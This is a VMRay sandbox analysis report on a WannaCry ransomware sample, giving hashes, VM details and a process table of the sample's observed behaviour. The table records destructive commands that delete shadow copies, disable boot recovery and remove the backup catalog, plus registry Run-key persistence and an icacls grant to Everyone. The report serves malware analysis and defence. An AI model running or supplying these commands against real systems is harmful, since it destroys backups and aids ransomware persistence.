WannaCry Ransomware | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-05-15 16:53 (UTC+2)
VM Analysis Duration Time 00:05:04
Execution Successful True
Sample Filename WanaDecrypt0r.bin.exe
Command Line Parameters False
Prescript False
Number of Processes 83
Termination Reason Maximum binlog size reached
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX
VTI Information
VTI Score
100 / 100
VTI Database Version 2.5
VTI Rule Match Count 9957
VTI Rule Type Default (PE, ...)
Tags
The tags feature is only available in the fully licensed version of VMRay Analyzer.
Remarks
Critical The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration.
Critical The overall sleep time of all monitored processes was truncated from 18 minutes, 59 seconds to 6 minutes, 19 seconds to reveal dormant functionality.
Screenshots
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x924 Analysis Target High (Elevated) wanadecrypt0r.bin.exe "C:\Users\DSsDPMx042\Desktop\WanaDecrypt0r.bin.exe"
#2 0x3f4 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k LocalService #1
#4 0x4 Created Daemon System (Elevated) System #1
#5 0x984 Created Daemon System (Elevated) wanadecrypt0r.bin.exe C:\Users\DSsDPMx042\Desktop\WanaDecrypt0r.bin.exe -m security #1
#6 0x9b8 Child Process High (Elevated) tasksche.exe C:\WINDOWS\tasksche.exe /i #1
#7 0x9ec Created Daemon System (Elevated) cmd.exe cmd.exe /c "C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe" #6
#8 0xa00 Child Process System (Elevated) tasksche.exe C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe #7
#9 0xa5c Child Process System (Elevated) attrib.exe attrib +h . #8
#10 0xa64 Child Process System (Elevated) icacls.exe icacls . /grant Everyone:F /T /C /Q #8
#11 0xb94 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#12 0xbb4 Child Process System (Elevated) cmd.exe cmd /c 29121494860050.bat #8
#13 0xbec Child Process System (Elevated) cscript.exe cscript.exe //nologo m.vbs #12
#14 0xdbc Child Process System (Elevated) taskdl.exe taskdl.exe #8
#15 0xf74 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#16 0xfb8 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#17 0x864 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#18 0x840 Child Process System (Elevated) cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs #8
#19 0x854 Child Process System (Elevated) @wanadecryptor@.exe @WanaDecryptor@.exe co #8
#20 0x810 Child Process System (Elevated) @wanadecryptor@.exe @WanaDecryptor@.exe vs #18
#21 0x784 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#22 0x128 Child Process System (Elevated) cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qxtqusdnjzrizx418" /t REG_SZ /d "\"C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe\"" /f #8
#23 0x430 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#24 0x878 Child Process System (Elevated) reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qxtqusdnjzrizx418" /t REG_SZ /d "\"C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe\"" /f #22
#25 0x31c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #21
#26 0x814 Child Process System (Elevated) taskhsvc.exe TaskData\Tor\taskhsvc.exe #19
#27 0x36c Child Process System (Elevated) cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet #20
#28 0x8fc Child Process System (Elevated) vssadmin.exe vssadmin delete shadows /all /quiet #27
#29 0x150 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#30 0x880 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #28
#31 0x92c Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#32 0x8cc Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #31
#33 0x8c RPC Server System (Elevated) svchost.exe C:\Windows\System32\svchost.exe -k swprv #30
#34 0x704 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#35 0x258 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#36 0x9c0 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #34
#37 0xa40 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#38 0xa5c Child Process System (Elevated) taskdl.exe taskdl.exe #8
#39 0xa68 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #37
#40 0xab4 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#41 0xac8 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #40
#42 0xb1c Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#43 0xb2c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #42
#44 0xb34 Child Process System (Elevated) wmic.exe wmic shadowcopy delete #27
#45 0xb4c Child Process System (Elevated) taskdl.exe taskdl.exe #8
#46 0x364 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #44
#47 0xbc4 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #46
#48 0xbb0 Child Process System (Elevated) bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures #27
#49 0xb94 Child Process System (Elevated) bcdedit.exe bcdedit /set {default} recoveryenabled no #27
#50 0xbd4 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#51 0xbe0 Child Process System (Elevated) wbadmin.exe wbadmin delete catalog -quiet #27
#52 0xbe8 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #50
#53 0xc2c RPC Server System (Elevated) wbengine.exe "C:\Windows\system32\wbengine.exe" #51
#54 0xc6c RPC Server System (Elevated) vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding #53
#55 0xd0c RPC Server System (Elevated) vds.exe C:\Windows\System32\vds.exe #54
#56 0xc78 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#57 0xd58 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#58 0xd68 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #57
#59 0xd78 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding #46
#60 0xda4 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#61 0xdd8 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#62 0xe24 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#63 0xdbc Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#64 0xe40 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #63
#65 0x57c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #61
#66 0xea0 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#67 0xec0 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#68 0x2c0 RPC Server System (Elevated) svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted #46
#69 0xef4 Child Process System (Elevated) wmiadap.exe wmiadap.exe /F /T /R #46
#70 0xf14 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #66
#71 0xf20 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#72 0xf54 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #71
#73 0xf80 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#74 0xf88 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#75 0x664 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #74
#76 0x180 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#77 0xc20 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#78 0x7a0 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #76
#79 0xff0 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#80 0x498 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#81 0x474 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #79
#82 0x728 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#83 0x6dc Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #82
#84 0x430 Child Process System (Elevated) taskdl.exe taskdl.exe #8
Sample Information
ID #1853086
MD5 Hash Value db349b97c37d22f5ea1d1841e3c89eb4
SHA1 Hash Value e889544aff85ffaf8b0d0da705105dee7c97fe26
SHA256 Hash Value 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
Filename WanaDecrypt0r.bin.exe
File Size 3.55 MB (3723264 bytes)
File Type Windows Exe (x86-32)
Analyzer and Virtual Machine Information
Analyzer Version 2.1.0
Analyzer Build Date 2017-05-15 15:58 (UTC+2)
Internet Explorer Version 8.0.7601.17514
Firefox Version 39.0
Java Version 8.0.1110.14
VM Name win7_32_sp1
VM Architecture x86 32-bit PAE
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".



    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image